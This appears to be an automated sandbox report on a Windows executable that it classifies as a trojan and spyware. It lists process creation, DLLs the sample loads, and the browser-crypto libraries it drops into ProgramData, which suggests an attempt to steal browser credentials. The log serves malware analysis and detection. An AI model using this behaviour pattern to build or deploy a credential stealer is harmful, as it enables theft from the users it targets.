Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C7CDCD0 2_2_6C7CDCD0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C72FC80 2_2_6C72FC80
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C6F3D00 2_2_6C6F3D00
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C761DC0 2_2_6C761DC0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C683D80 2_2_6C683D80
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C7D9D90 2_2_6C7D9D90
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C7EBE70 2_2_6C7EBE70
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C79DE10 2_2_6C79DE10
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C6B3EC0 2_2_6C6B3EC0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C815E60 2_2_6C815E60
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C813FC0 2_2_6C813FC0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C793F30 2_2_6C793F30
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C6C5F20 2_2_6C6C5F20
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C685F30 2_2_6C685F30
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C7E7F20 2_2_6C7E7F20
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C73BFF0 2_2_6C73BFF0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C7ADFC0 2_2_6C7ADFC0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C6B1F90 2_2_6C6B1F90
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C763840 2_2_6C763840
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C6ED810 2_2_6C6ED810
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C76F8F0 2_2_6C76F8F0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C69D8E0 2_2_6C69D8E0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C6C38E0 2_2_6C6C38E0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C7EB8F0 2_2_6C7EB8F0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C72F8C0 2_2_6C72F8C0
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C70F960 2_2_6C70F960
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C74D960 2_2_6C74D960
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C745920 2_2_6C745920
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: String function: 6C6B3620 appears 74 times
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: String function: 00EEB8A4 appears 64 times
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: String function: 00ED7A89 appears 58 times
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: String function: 00EBD500 appears 46 times
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: String function: 00EAF210 appears 64 times
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: String function: 6C7C9F30 appears 33 times
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: String function: 6C81D930 appears 50 times
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: String function: 6C6B9B10 appears 86 times
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: String function: 6C6EC5E0 appears 35 times
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: String function: 6C81DAE0 appears 62 times
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: String function: 00EAFFC0 appears 124 times
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: String function: 6C8109D0 appears 272 times
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: String function: 00EAF1DD appears 202 times
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: String function: 004045C0 appears 317 times
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 2240
Source: ND2WP0Fip7.exe, 00000000.00000000.1703786816.0000000000F6B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamePrint.Exej% vs ND2WP0Fip7.exe
Source: ND2WP0Fip7.exe, 00000001.00000000.1717560718.0000000000F6B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamePrint.Exej% vs ND2WP0Fip7.exe
Source: ND2WP0Fip7.exe, 00000002.00000002.2097304744.000000006C865000.00000002.00000001.01000000.00000007.sdmp Binary or memory string: OriginalFilenamenss3.dll0 vs ND2WP0Fip7.exe
Source: ND2WP0Fip7.exe, 00000002.00000000.1717841295.0000000000F6B000.00000002.00000001.01000000.00000003.sdmp Binary or memory string: OriginalFilenamePrint.Exej% vs ND2WP0Fip7.exe
Source: ND2WP0Fip7.exe, 00000002.00000002.2097442738.000000006F902000.00000002.00000001.01000000.00000008.sdmp Binary or memory string: OriginalFilenamemozglue.dll0 vs ND2WP0Fip7.exe
Source: ND2WP0Fip7.exe Binary or memory string: OriginalFilenamePrint.Exej% vs ND2WP0Fip7.exe
Source: ND2WP0Fip7.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/39@0/1
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_6C6F0300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError, 2_2_6C6F0300
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00418680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 2_2_00418680
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 2_2_00413720
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\23GEJXUD.htm Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4296
Source: C:\Windows\SysWOW64\WerFault.exe File created: C:\ProgramData\Microsoft\Windows\WER\Temp\f5a1c182-9fa1-4bb9-b1a1-7cd60a722fbb Jump to behavior
Source: ND2WP0Fip7.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: ND2WP0Fip7.exe, 00000002.00000002.2089756996.000000001B46E000.00000004.00000020.00020000.00000000.sdmp, ND2WP0Fip7.exe, 00000002.00000002.2097197969.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, ND2WP0Fip7.exe, 00000002.00000002.2096857330.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: ND2WP0Fip7.exe, 00000002.00000002.2089756996.000000001B46E000.00000004.00000020.00020000.00000000.sdmp, ND2WP0Fip7.exe, 00000002.00000002.2097197969.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, ND2WP0Fip7.exe, 00000002.00000002.2096857330.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: ND2WP0Fip7.exe, 00000002.00000002.2089756996.000000001B46E000.00000004.00000020.00020000.00000000.sdmp, ND2WP0Fip7.exe, 00000002.00000002.2097197969.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, ND2WP0Fip7.exe, 00000002.00000002.2096857330.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: ND2WP0Fip7.exe, 00000002.00000002.2089756996.000000001B46E000.00000004.00000020.00020000.00000000.sdmp, ND2WP0Fip7.exe, 00000002.00000002.2097197969.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, ND2WP0Fip7.exe, 00000002.00000002.2096857330.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: ND2WP0Fip7.exe, ND2WP0Fip7.exe, 00000002.00000002.2089756996.000000001B46E000.00000004.00000020.00020000.00000000.sdmp, ND2WP0Fip7.exe, 00000002.00000002.2097197969.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, ND2WP0Fip7.exe, 00000002.00000002.2096857330.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: ND2WP0Fip7.exe, 00000002.00000002.2089756996.000000001B46E000.00000004.00000020.00020000.00000000.sdmp, ND2WP0Fip7.exe, 00000002.00000002.2096857330.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: ND2WP0Fip7.exe, 00000002.00000002.2089756996.000000001B46E000.00000004.00000020.00020000.00000000.sdmp, ND2WP0Fip7.exe, 00000002.00000002.2097197969.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, ND2WP0Fip7.exe, 00000002.00000002.2096857330.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: ND2WP0Fip7.exe, 00000002.00000003.1804270847.00000000213E9000.00000004.00000020.00020000.00000000.sdmp, CBKFBAECBAEGDGDHIEHI.2.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: ND2WP0Fip7.exe, 00000002.00000002.2089756996.000000001B46E000.00000004.00000020.00020000.00000000.sdmp, ND2WP0Fip7.exe, 00000002.00000002.2096857330.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: ND2WP0Fip7.exe, 00000002.00000002.2089756996.000000001B46E000.00000004.00000020.00020000.00000000.sdmp, ND2WP0Fip7.exe, 00000002.00000002.2096857330.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.2.dr, softokn3.dll.2.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: ND2WP0Fip7.exe Virustotal: Detection: 41%
Source: ND2WP0Fip7.exe String found in binary or memory: ft.com/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d
Source: ND2WP0Fip7.exe String found in binary or memory: m/en-us/office/examples-of-office-product-keys-7d48285b-20e8-4b9b-91ad-216e34163bad?wt.mc_id=enterpk2016&ui=en-us&rs=en-us&ad=us https://support.microsoft.com/en-us/topic/install-the-english-language-pack-for-32-bit-office-94ba2e0b-638e-4a92-8857-2cb5ac1d8e17?
Source: unknown Process created: C:\Users\user\Desktop\ND2WP0Fip7.exe "C:\Users\user\Desktop\ND2WP0Fip7.exe"
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Process created: C:\Users\user\Desktop\ND2WP0Fip7.exe "C:\Users\user\Desktop\ND2WP0Fip7.exe"
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Process created: C:\Users\user\Desktop\ND2WP0Fip7.exe "C:\Users\user\Desktop\ND2WP0Fip7.exe"
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4296 -s 2240
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Process created: C:\Users\user\Desktop\ND2WP0Fip7.exe "C:\Users\user\Desktop\ND2WP0Fip7.exe" Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Process created: C:\Users\user\Desktop\ND2WP0Fip7.exe "C:\Users\user\Desktop\ND2WP0Fip7.exe" Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: ND2WP0Fip7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: ND2WP0Fip7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: ND2WP0Fip7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: ND2WP0Fip7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: ND2WP0Fip7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: ND2WP0Fip7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: ND2WP0Fip7.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: ND2WP0Fip7.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: mozglue.pdbP source: ND2WP0Fip7.exe, 00000002.00000002.2097401273.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source: Binary string: freebl3.pdb source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source: Binary string: freebl3.pdbp source: freebl3.dll.2.dr, freebl3[1].dll.2.dr
Source: Binary string: nss3.pdb@ source: ND2WP0Fip7.exe, 00000002.00000002.2097197969.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source: Binary string: C:\pbtflbwpofh14\Literally.pdb source: ND2WP0Fip7.exe
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.2.dr, vcruntime140[1].dll.2.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140.dll.2.dr, msvcp140[1].dll.2.dr
Source: Binary string: nss3.pdb source: ND2WP0Fip7.exe, 00000002.00000002.2097197969.000000006C81F000.00000002.00000001.01000000.00000007.sdmp, nss3[1].dll.2.dr, nss3.dll.2.dr
Source: Binary string: mozglue.pdb source: ND2WP0Fip7.exe, 00000002.00000002.2097401273.000000006F8ED000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.2.dr, mozglue.dll.2.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.2.dr, softokn3.dll.2.dr
Source: Binary string: C:\pbtflbwpofh14\Literally.pdb source: ND2WP0Fip7.exe
Source: ND2WP0Fip7.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: ND2WP0Fip7.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: ND2WP0Fip7.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: ND2WP0Fip7.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: ND2WP0Fip7.exe Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00419860
Source: msvcp140[1].dll.2.dr Static PE information: section name: .didat
Source: nss3.dll.2.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.2.dr Static PE information: section name: .00cfg
Source: softokn3.dll.2.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.2.dr Static PE information: section name: .00cfg
Source: freebl3.dll.2.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.2.dr Static PE information: section name: .00cfg
Source: mozglue.dll.2.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.2.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.2.dr Static PE information: section name: .didat
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00F34F65 push ecx; ret 0_2_00F34F78
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00EAF1AB push ecx; ret 0_2_00EAF1BE
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00E8967B push 8B00F091h; iretd 0_2_00E89680
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 0_2_00E89637 push 8B00F091h; iretd 0_2_00E8963C
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00EAF1AB push ecx; ret 1_2_00EAF1BE
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00E8967B push 8B00F091h; iretd 1_2_00E89680
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 1_2_00E89637 push 8B00F091h; iretd 1_2_00E8963C
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_0041B035 push ecx; ret 2_2_0041B048
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\ND2WP0Fip7.exe Code function: 2_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 2_2_00419860
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
